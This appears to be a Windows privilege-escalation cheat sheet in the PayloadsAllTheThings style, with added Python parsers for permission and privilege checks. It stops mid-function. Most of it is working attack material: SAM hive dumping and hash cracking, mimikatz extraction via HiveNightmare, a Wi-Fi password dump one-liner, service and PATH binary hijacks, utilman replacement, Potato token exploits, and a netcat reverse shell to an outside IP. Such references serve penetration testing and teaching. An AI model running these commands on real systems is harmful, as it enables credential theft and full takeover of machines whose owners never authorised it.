```powershell
# First obtain systeminfo on the target
systeminfo
systeminfo > systeminfo.txt

# Then feed it to wesng (Windows Exploit Suggester - Next Generation) on the attacking machine
python3 wes.py --update-wes
python3 wes.py --update
python3 wes.py systeminfo.txt
```
```powershell
# OS architecture
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
```
List all env variables
```powershell
set
Get-ChildItem Env: | ft Key,Value
```
List all drives
```powershell
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"} | ft Name,Root
```
User Enumeration
Get current username
```powershell
echo %USERNAME% || whoami
$env:username
```
List user privileges and group memberships
```powershell
whoami /priv
whoami /groups
```
List all users
```powershell
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
List logon requirements (password policy and lockout threshold); check these before any password bruteforcing so you do not lock accounts out
```powershell
net accounts
```
Get details about a user (e.g. administrator, admin, the current user)
```powershell
net user administrator
net user admin
net user %USERNAME%
```
List all local groups
```powershell
net localgroup
Get-LocalGroup | ft Name
```
Get details about a group (e.g. administrators)
```powershell
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
# localized group name on French systems
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
```
The Security Account Manager (SAM) is the database in which local account passwords are stored as LM or NTLM hashes. The hive file lives at %SystemRoot%\System32\config\SAM and is mounted under HKLM\SAM. While Windows is running the file is held open exclusively, so it is normally obtained from the backup copies below, from a volume shadow copy, or via `reg save` as an administrator; decrypting the hashes also requires the SYSTEM hive, which holds the boot key.
```powershell
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```
Generate a hash file for John using pwdump or samdump2 (both take the SYSTEM hive first, then the SAM hive):
```powershell
pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
```
Then either crack it with `john --format=NT /root/sam.txt` or hashcat (`-m 1000` for NTLM), or skip cracking and use the NTLM hash directly with Pass-The-Hash.
HiveNightmare
CVE-2021-36934 (HiveNightmare, also known as SeriousSAM) lets a non-administrator read all registry hives (SAM, SECURITY, SYSTEM) on Windows 10 (from version 1809) and Windows 11, because the hive files under %SystemRoot%\System32\config were created with an ACL granting BUILTIN\Users read access. The live files are still locked, so exploitation needs at least one volume shadow copy to exist (system restore points and feature updates create them, for example).
Check for the vulnerability using icacls:
```powershell
C:\Windows\System32> icacls config\SAM
config\SAM BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)  <-- this is wrong - regular users should not have read access!
```
Then exploit the CVE by listing the shadow copies on the filesystem and reading the hives from one of them:
```powershell
mimikatz> token::whoami /full

# List shadow copies available
mimikatz> misc::shadowcopies

# Extract accounts from the SAM database
mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

# Extract secrets from SECURITY
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
```
LAPS Settings
Read the values under HKLM\Software\Policies\Microsoft Services\AdmPwd in the registry (the policy key of legacy Microsoft LAPS). They tell you whether LAPS manages the local administrator password on this host, under which account name, and how the password is generated:
LAPS Enabled: AdmPwdEnabled
LAPS Admin Account Name: AdminAccountName
LAPS Password Complexity: PasswordComplexity
LAPS Password Length: PasswordLength
LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
Also search in remote places such as SMB shares and SharePoint:
Search passwords in SharePoint: nheiniger/SnaffPoint (must be compiled first; for a referencing issue see https://github.com/nheiniger/SnaffPoint/pull/6)
```powershell
# First, retrieve a token
## Method 1: using the SnaffPoint binary
$token = (.\GetBearerToken.exe https://your.sharepoint.com)
## Method 2: using AADInternals
Install-Module AADInternals -Scope CurrentUser
Import-Module AADInternals
$token = (Get-AADIntAccessToken -ClientId "9bc3ab49-b65d-410a-85ad-de819febfddc" -Tenant "your.onmicrosoft.com" -Resource "https://your.sharepoint.com")

# Second, search on SharePoint
## Method 1: using the search strings in the ./presets dir
.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token
## Method 2: using a search string on the command line
### -l uses FQL search, see: https://learn.microsoft.com/en-us/sharepoint/dev/general-development/fast-query-language-fql-syntax-reference
.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token -l -q "filename:.config"
```
One-liner to extract the Wi-Fi passwords ("Key Content") of every saved wireless profile:
```powershell
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```
Sticky Notes passwords
The Sticky Notes app stores its content in a SQLite database located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite; copy it off and open it with any SQLite client.
Passwords stored in services
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY and RDP can be recovered with SessionGopher.
List installed programs and software registry keys:
```powershell
Get-ChildItem 'C:\Program Files','C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```
List services
```powershell
net start
wmic service list brief
tasklist /SVC
```
Enumerate scheduled tasks
```powershell
schtasks /query /fo LIST 2>nul | findstr TaskName
# dump everything, then look for tasks running as SYSTEM (the grep part is for analysis on a Linux box)
schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
Startup tasks
```powershell
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
```
EoP - Incorrect permissions in services
A service running as Administrator/SYSTEM whose binary (or the directory containing it) has weak file permissions allows EoP: replace the binary, restart the service (or reboot, if you cannot stop and start it yourself) and the payload runs under the service's account. Check the binary's DACL with icacls and the service object's own DACL with `sc sdshow <service>` to know whether you are allowed to restart it.
Often, services point to writable locations:
- Orphaned installs, not installed anymore but still present in startup
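Both permission checks above (BUILTIN\Users holding read on the SAM hive for HiveNightmare, and a service binary or its directory being writable by ordinary users) reduce to reading icacls output carefully: inherited flags are not rights, deny ACEs win, and "Users", "Everyone" and "Authenticated Users" all cover the account you are running as. The parser below is an added example written for this page, not code from PayloadsAllTheThings or from icacls. The sample outputs are constructed (the first mirrors the HiveNightmare listing above); the principal set treated as low-privileged and the rights treated as read/write are my assumptions and may need extending (domain Users, for instance).

```python
from __future__ import annotations

import re

# One ACE as icacls prints it: "<principal>:(<flag>)(<flag>)...". The first line of
# the output also carries the queried path in front of the first ACE.
ACE_RE = re.compile(r"^(?P<who>[^():]+?):(?P<groups>(?:\([^)]*\))+)\s*$")

INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}          # inheritance, not rights
READ_RIGHTS = {"F", "M", "RX", "R", "GR", "GA", "RD"}   # simple + specific rights implying read
WRITE_RIGHTS = {"F", "M", "W", "GW", "GA", "WD", "AD", "WDAC", "WO", "DE"}
# Assumption: principals every authenticated local user belongs to (compared lowercase).
LOW_PRIV = {"builtin\\users", "everyone", "nt authority\\authenticated users",
            "nt authority\\interactive"}


def parse_icacls(path: str, output: str) -> list[dict]:
    """Parse `icacls <path>` output for a single file into ACEs:
    {"who": principal, "deny": bool, "rights": set of icacls right tokens}."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):   # first line: drop the path prefix
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised icacls line: {raw!r}")
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        rights: set[str] = set()
        for g in groups:
            if g in INHERIT_FLAGS or g == "DENY":
                continue
            rights.update(tok.strip() for tok in g.split(","))  # "(RD,WD,...)" lists
        aces.append({"who": m.group("who").strip(), "deny": "DENY" in groups, "rights": rights})
    return aces


def low_priv_access(aces: list[dict]) -> set[str]:
    """Effective {"read", "write"} an ordinary user gets from the low-privileged
    principals. A deny on any of those broad groups hits every ordinary user, so
    denies are subtracted from the union of allows rather than per principal."""
    allow: set[str] = set()
    deny: set[str] = set()
    for ace in aces:
        if ace["who"].lower() not in LOW_PRIV:
            continue
        granted = set()
        if ace["rights"] & READ_RIGHTS:
            granted.add("read")
        if ace["rights"] & WRITE_RIGHTS:
            granted.add("write")
        (deny if ace["deny"] else allow).update(granted)
    return allow - deny


def hivenightmare_exposed(sam_icacls_output: str, path: str = "config\\SAM") -> bool:
    """CVE-2021-36934 precondition: a low-privileged principal can read the SAM hive.
    Actually reading it still needs an existing shadow copy (the live file is locked)."""
    return "read" in low_priv_access(parse_icacls(path, sam_icacls_output))


def writable_by_low_priv(path: str, icacls_output: str) -> bool:
    """Service binary / directory check: can an ordinary user modify it?"""
    return "write" in low_priv_access(parse_icacls(path, icacls_output))


# Constructed sample outputs (not captured from a real host).
SAM_VULNERABLE = """config\\SAM BUILTIN\\Administrators:(I)(F)
           NT AUTHORITY\\SYSTEM:(I)(F)
           BUILTIN\\Users:(I)(RX)
           APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
SAM_FIXED = """config\\SAM BUILTIN\\Administrators:(I)(F)
           NT AUTHORITY\\SYSTEM:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""
# Constructed: a third-party service binary whose ACL grants Users Modify.
SVC_BIN_PATH = "C:\\Program Files\\Vendor Agent\\agent.exe"
SVC_BIN = """C:\\Program Files\\Vendor Agent\\agent.exe BUILTIN\\Administrators:(I)(F)
                                          NT AUTHORITY\\SYSTEM:(I)(F)
                                          BUILTIN\\Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    print("HiveNightmare exposed:", hivenightmare_exposed(SAM_VULNERABLE))   # True
    print("HiveNightmare exposed after fix:", hivenightmare_exposed(SAM_FIXED))  # False
    print("service binary writable by Users:", writable_by_low_priv(SVC_BIN_PATH, SVC_BIN))  # True
```

Feed it the output of `icacls <file>` captured one file at a time (the path prefix on the first line is stripped by name, so a path containing spaces is fine). A hit on the SAM check only tells you the ACL is wrong; confirm a shadow copy exists (`vssadmin list shadows` needs admin, mimikatz `misc::shadowcopies` does not) before relying on it.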
Windows Subsystem for Linux (WSL) lets a user create a bind shell on any port without Windows elevation (root inside WSL is not SYSTEM on the host, but the listener is reachable like any other). Don't know the root password? No problem, just set the default user to root with `<distro>.exe --default-user root` (e.g. ubuntu.exe), then start your bind or reverse shell.
The bash.exe binary can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
Alternatively you can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
EoP - Unquoted Service Paths
Every Windows service has a path to its executable. If that path is unquoted and contains spaces, the Service Control Manager hands the raw string to CreateProcess, which tries each space-delimited prefix (with .exe appended when the prefix has no extension) as the executable before reaching the real binary. If one of those parent directories is writable by you, a planted binary runs with the service's account the next time the service starts.
```powershell
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
```
For C:\Program Files\Some Vendor\legit.exe, Windows will try the following paths first (splitting happens only at spaces, never at backslashes):
C:\Program.exe
C:\Program Files\Some.exe
Note that ordinary users can create folders but not files in C:\ by default, so the first candidate is rarely usable; the interesting ones are inside vendor directories with lax permissions.
EoP - $PATH Interception
Requirements:
- PATH contains a folder writable by a low-privileged user.
- That folder appears before the folder that contains the legitimate binary.
EXAMPLE:
```powershell
# List contents of the PATH environment variable
# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32
$env:Path

# See permissions of the target folder
# EXAMPLE OUTPUT: BUILTIN\Users: GR,GW
icacls.exe "C:\Program Files\nodejs\"

# Place our evil-file in that folder.
copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"
```
Because (in this example) "C:\Program Files\nodejs" comes before "C:\WINDOWS\system32" in PATH, the next time the user runs "cmd.exe" by name our version in the nodejs folder runs instead of the legitimate one in system32. Which lookup applies depends on how the binary is launched: cmd.exe and PowerShell resolve a bare command name by walking PATH in order (cmd.exe after the current directory), whereas a program calling CreateProcess with a bare name checks its own directory and the system directories before PATH, so this primarily catches interactive and script-driven launches.
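Both hijack classes above come down to one search-order question: which filesystem locations are consulted before the intended binary, and is any of them writable. The script below is an added example (mine, not code from PayloadsAllTheThings or from Windows) that implements CreateProcess's whitespace-splitting rule for unquoted service paths and the left-to-right PATH walk, and cross-references both with a set of writable directories. The service records, writable directories and PATH string are constructed samples standing in for the output of the wmic, icacls and $env:Path commands shown above.

```python
from __future__ import annotations

import re

# Once a prefix ends in one of these, CreateProcess has found the intended module and
# treats the remainder of the string as arguments.
EXECUTABLE_EXTS = (".exe", ".com", ".bat", ".cmd")


def _norm_dir(path: str) -> str:
    """Lowercase a directory path, drop surrounding quotes, force one trailing backslash."""
    return path.strip().strip('"').rstrip("\\").lower() + "\\"


def hijack_candidates(pathname: str) -> list[str]:
    """Return, in the order Windows tries them, the paths the Service Control Manager
    (via CreateProcess) attempts before the real binary of an unquoted service path.
    Every whitespace is a possible end of the module name; a prefix without an
    extension gets .exe appended."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return []  # quoted paths are parsed as intended
    candidates = []
    for m in re.finditer(r"\s", pathname):
        prefix = pathname[: m.start()]
        last = prefix.rsplit("\\", 1)[-1]
        if last.lower().endswith(EXECUTABLE_EXTS):
            break  # reached the intended executable; the rest are arguments
        candidates.append(prefix if "." in last else prefix + ".exe")
    return candidates


def unquoted_service_findings(services: list[dict], writable_dirs: set[str]) -> list[tuple[str, str]]:
    """Same filter as the wmic/gwmi one-liners above (auto-start, outside C:\\Windows,
    unquoted), keeping only candidates whose parent directory is writable.
    C:\\ itself normally lets users create folders but not files, so C:\\Program.exe
    only shows up here if you explicitly list "C:\\" as writable."""
    writable = {_norm_dir(d) for d in writable_dirs}
    findings = []
    for svc in services:
        path = svc["PathName"]
        if svc.get("StartMode", "").lower() != "auto":
            continue
        if _norm_dir(path).startswith("c:\\windows\\"):
            continue
        for cand in hijack_candidates(path):
            if _norm_dir(cand.rsplit("\\", 1)[0]) in writable:
                findings.append((svc["Name"], cand))
    return findings


def path_interception(path_env: str, writable_dirs: set[str],
                      legit_locations: dict[str, str]) -> dict[str, list[str]]:
    """For each binary name -> directory it legitimately lives in, list the writable
    PATH entries searched before that directory (left to right)."""
    order = [_norm_dir(p) for p in path_env.split(";") if p.strip()]
    writable = {_norm_dir(d) for d in writable_dirs}
    report: dict[str, list[str]] = {}
    for binary, legit_dir in legit_locations.items():
        legit = _norm_dir(legit_dir)
        hijackable = []
        for entry in order:
            if entry == legit:
                break  # the real binary is found here; later entries never matter
            if entry in writable:
                hijackable.append(entry)
        report[binary] = hijackable
    return report


# Constructed sample records in the shape of `wmic service get name,startmode,pathname`.
SAMPLE_SERVICES = [
    {"Name": "Spooler", "StartMode": "Auto", "PathName": "C:\\Windows\\System32\\spoolsv.exe"},
    {"Name": "VendorAgent", "StartMode": "Auto",
     "PathName": "C:\\Program Files\\Some Vendor\\Agent Tools\\agent.exe -service"},
    {"Name": "SafeSvc", "StartMode": "Auto",
     "PathName": "\"C:\\Program Files\\Safe Vendor\\svc.exe\" -service"},
    {"Name": "LabTool", "StartMode": "Manual", "PathName": "C:\\Tools\\My Tool\\tool.exe"},
]
# Constructed: directories where icacls showed BUILTIN\Users with write access.
WRITABLE = {"C:\\Program Files\\Some Vendor\\", "C:\\Program Files\\nodejs\\"}
SAMPLE_PATH = "C:\\Program Files\\nodejs\\;C:\\WINDOWS\\system32;C:\\WINDOWS"

if __name__ == "__main__":
    for name, cand in unquoted_service_findings(SAMPLE_SERVICES, WRITABLE):
        print(f"[unquoted] {name}: drop payload at {cand}")
    legit = {"cmd.exe": "C:\\WINDOWS\\system32", "node.exe": "C:\\Program Files\\nodejs"}
    for binary, dirs in path_interception(SAMPLE_PATH, WRITABLE, legit).items():
        print(f"[PATH] {binary}: {dirs or 'no writable entry before the real one'}")
```

On the sample data the only unquoted-path hit is VendorAgent with C:\Program Files\Some Vendor\Agent.exe (the earlier candidates C:\Program.exe and C:\Program Files\Some.exe sit in directories Users cannot write to), and cmd.exe is interceptable through the nodejs folder while node.exe is not, because that folder is where node.exe legitimately lives (replacing it directly is the incorrect-permissions case, not a PATH issue).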
EoP - Named Pipes
Find named pipes: [System.IO.Directory]::GetFiles("\\.\pipe\")
Check named pipes DACL: pipesec.exe <named_pipe>
Reverse engineering software
Send data through the named pipe: program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe
Using the reg query command, check the AlwaysInstallElevated value under HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and under HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer. Only if both queries return 0x1 is the policy effective: any user can then install an .msi package whose actions run as NT AUTHORITY\SYSTEM. One key set to 1 with the other missing or 0 is not exploitable.
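The "both keys" condition is the part people get wrong, so here is an added example (not from the page or from Microsoft) that reads the two `reg query ... /v AlwaysInstallElevated` outputs and only reports the machine as vulnerable when both DWORDs are 1. The outputs are constructed, including the ERROR line reg.exe prints when the key or value does not exist.

```python
from __future__ import annotations

import re

# Commands whose output this parser consumes:
#   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#   reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
VALUE_RE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)", re.IGNORECASE)


def always_install_elevated_value(reg_query_output: str) -> int | None:
    """DWORD value from reg query output, or None when reg reported that the key or
    value does not exist (a missing policy means 'not enabled')."""
    m = VALUE_RE.search(reg_query_output)
    return int(m.group(1), 16) if m else None


def always_install_elevated(hklm_output: str, hkcu_output: str) -> bool:
    """Vulnerable only when BOTH the machine and the user policy are 0x1."""
    return (always_install_elevated_value(hklm_output) == 1
            and always_install_elevated_value(hkcu_output) == 1)


# Constructed sample outputs.
HKLM_SET = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_SET = """
HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"

if __name__ == "__main__":
    print("both set      ->", always_install_elevated(HKLM_SET, HKCU_SET))      # True
    print("HKCU missing  ->", always_install_elevated(HKLM_SET, HKCU_MISSING))  # False
```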
Custom Actions in MSI allow developers to specify scripts or executables to be run at various points during an installation
mgeeky/msidump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner.
activescott/lessmsi - A tool to view and extract the contents of an Windows Installer (.msi) file.
mandiant/msi-search - This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file.
Enumerate products on the machine
```powershell
wmic product get identifyingnumber,name,vendor,version
```
Run a repair with msiexec and the /fa parameter to trigger the CustomActions, passing either the IdentifyingNumber {E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1} or the path of the cached installer c:\windows\installer\XXXXXXX.msi. The repair is executed by the Windows Installer service as NT AUTHORITY\SYSTEM; custom actions that are not marked to impersonate the invoking user inherit that account, which is why a console window or file dialog spawned during the repair is worth looking for.
An application running as SYSTEM that lets a user spawn a CMD or browse directories (for example through a file dialog).
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
EoP - Evaluating Vulnerable Drivers
Look for vulnerable drivers that are loaded; we often don't spend enough time looking at this:
Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats.
Native binary: DriverQuery.exe
```powershell
PS C:\Users\Swissky> driverquery.exe /fo table /si
Module Name  Display Name           Driver Type   Link Date
============ ====================== ============= ======================
1394ohci     1394 OHCI Compliant Ho Kernel        12/10/2006 4:44:38 PM
3ware        3ware                  Kernel        5/18/2015 6:28:03 PM
ACPI         Microsoft ACPI Driver  Kernel        12/9/1975 6:17:08 AM
AcpiDev      ACPI Devices driver    Kernel        12/7/1993 6:22:19 AM
acpiex       Microsoft ACPIEx Drive Kernel        3/1/2087 8:53:50 AM
acpipagr     ACPI Processor Aggrega Kernel        1/24/2081 8:36:36 AM
AcpiPmi      ACPI Power Meter Drive Kernel        11/19/2006 9:20:15 PM
acpitime     ACPI Wake Alarm Driver Kernel        2/9/1974 7:10:30 AM
ADP80XX      ADP80XX                Kernel        4/9/2015 4:49:48 PM
<SNIP>
```
The odd link dates are expected: recent Microsoft binaries are built reproducibly and store a hash rather than a timestamp in that field, so match driver names and file versions against the LOLDrivers list instead of judging by age.
If saved credentials exist (cmdkey /list shows them), you can use runas with the /savecred option to run a command as that user, for example a binary hosted on an SMB share.
If you have local administrator access on a machine, try to list shadow copies: they are an easy source of hive files and other locked data for privilege escalation.
```powershell
# List shadow copies using vssadmin (needs Administrator access)
vssadmin list shadows
# List shadow copies using diskshadow
diskshadow list shadows all
# Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
```
EoP - From local administrator to NT SYSTEM
```powershell
# Sysinternals PsExec, run from an elevated prompt: -s runs as SYSTEM, -i makes it interactive
PsExec.exe -i -s cmd.exe
```
EoP - Living Off The Land Binaries and Scripts
Living Off The Land Binaries and Scripts (and also Libraries): https://lolbas-project.github.io/
The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
A LOLBin/Lib/Script must:
- Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
- Have extra "unexpected" functionality. It is not interesting to document intended use cases. Exceptions are application whitelisting bypasses.
- Have functionality that would be useful to an APT or red team.
Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin; the summary below only lists direct ways to exploit the privilege to obtain an admin session or read sensitive files.

| Privilege | Impact | Tool | Execution path | Remarks |
|---|---|---|---|---|
| SeAssignPrimaryToken | Admin | 3rd party tool | "It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe" | Thank you for the update. I will try to re-phrase it to something more recipe-like soon. |
| SeBackup | Threat | Built-in commands | Read sensitive files with `robocopy /b` | - May be more interesting if you can read %WINDIR%\MEMORY.DMP<br>- SeBackupPrivilege (and robocopy) is not helpful when it comes to open files.<br>- Robocopy requires both SeBackup and SeRestore to work with the /b parameter. |
| SeCreateToken | Admin | 3rd party tool | Create an arbitrary token including local admin rights with NtCreateToken. | |
| SeDebug | Admin | PowerShell | Duplicate the lsass.exe token. | Script to be found at |
| SeLoadDriver | Admin | 3rd party tool | 1. Load a buggy kernel driver such as szkg64.sys or capcom.sys<br>2. Exploit the driver vulnerability<br>Alternatively, the privilege may be used to unload security-related drivers with the fltMC built-in command, e.g. `fltmc unload sysmondrv` | 1. The szkg64 vulnerability is listed as<br>2. The szkg64 was created by |
| SeRestore | Admin | PowerShell | 1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege.<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U | Attack may be detected by some AV software.<br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| SeTakeOwnership | Admin | Built-in commands | 1. `takeown.exe /f "%windir%\system32"`<br>2. `icacls.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U | Attack may be detected by some AV software.<br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| SeTcb | Admin | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate. | To be verified. |
| SeRelabel | Admin | 3rd party tool | Allows you to own resources that have an integrity level even higher than your own | |
Restore A Service Account's Privileges
This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only; it recovers the default privilege set of those accounts (SeImpersonate included) by having the Task Scheduler hand out a fresh token.
```powershell
# https://github.com/itm4n/FullPowers
c:\TOOLS>FullPowers
[+] Started dummy thread with id 9976
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
```
If the machine is >= Windows 10 1809 or Windows Server 2019, try RoguePotato (or PrintSpoofer / EfsPotato below).
If the machine is < Windows 10 1809 / < Windows Server 2019, try JuicyPotato.
All of them require SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, which service accounts such as IIS application pools and LOCAL SERVICE / NETWORK SERVICE typically hold.
```powershell
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999

# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.
# Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"

# RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999

# RoguePotato all in one with RogueOxidResolver running locally on port 9999 and a specific clsid and custom pipename
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
```
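To tie the privilege table to the Potato decision above, here is an added example (mine, not code from PayloadsAllTheThings or any of the Potato tools). It parses `whoami /priv` and the "OS Version" line of `systeminfo`, flags the privileges listed in the table, and picks the tool family by build number (17763 is Windows 10 1809 / Server 2019, the cut-off the page gives). The whoami and systeminfo excerpts are constructed samples resembling an IIS application-pool identity on Server 2019; the short tool descriptions are condensed from the table, not an exhaustive mapping.

```python
from __future__ import annotations

import re

# Privilege -> (impact, direct exploitation path), condensed from the table above.
DANGEROUS_PRIVILEGES = {
    "SeAssignPrimaryTokenPrivilege": ("Admin", "potato family (RottenPotato, JuicyPotato, RoguePotato)"),
    "SeImpersonatePrivilege": ("Admin", "potato family, PrintSpoofer, EfsPotato"),
    "SeBackupPrivilege": ("Threat", "read sensitive files with robocopy /b (needs SeRestore as well)"),
    "SeRestorePrivilege": ("Admin", "rename cmd.exe to utilman.exe, lock the console, Win+U"),
    "SeCreateTokenPrivilege": ("Admin", "NtCreateToken with local admin rights included"),
    "SeDebugPrivilege": ("Admin", "duplicate the lsass.exe token"),
    "SeLoadDriverPrivilege": ("Admin", "load a vulnerable driver (szkg64.sys, capcom.sys)"),
    "SeTakeOwnershipPrivilege": ("Admin", "takeown + icacls on %windir%\\system32, then the utilman trick"),
    "SeTcbPrivilege": ("Admin", "token manipulation (may require SeImpersonate)"),
    "SeRelabelPrivilege": ("Admin", "own resources above your own integrity level"),
}

PRIV_LINE_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", re.MULTILINE)
BUILD_RE = re.compile(r"OS Version:\s+\d+\.\d+\.(\d+)")
# First build on which JuicyPotato no longer works: Windows 10 1809 / Server 2019.
ROGUE_POTATO_MIN_BUILD = 17763


def parse_whoami_priv(output: str) -> dict[str, str]:
    """Map privilege name -> state from `whoami /priv`. A Disabled privilege is still
    held (the process can enable it with AdjustTokenPrivileges); only absence matters."""
    return {name: state for name, state in PRIV_LINE_RE.findall(output)}


def build_from_systeminfo(output: str) -> int | None:
    """Build number from the 'OS Version: 10.0.17763 N/A Build 17763' line."""
    m = BUILD_RE.search(output)
    return int(m.group(1)) if m else None


def potato_choice(build: int) -> list[str]:
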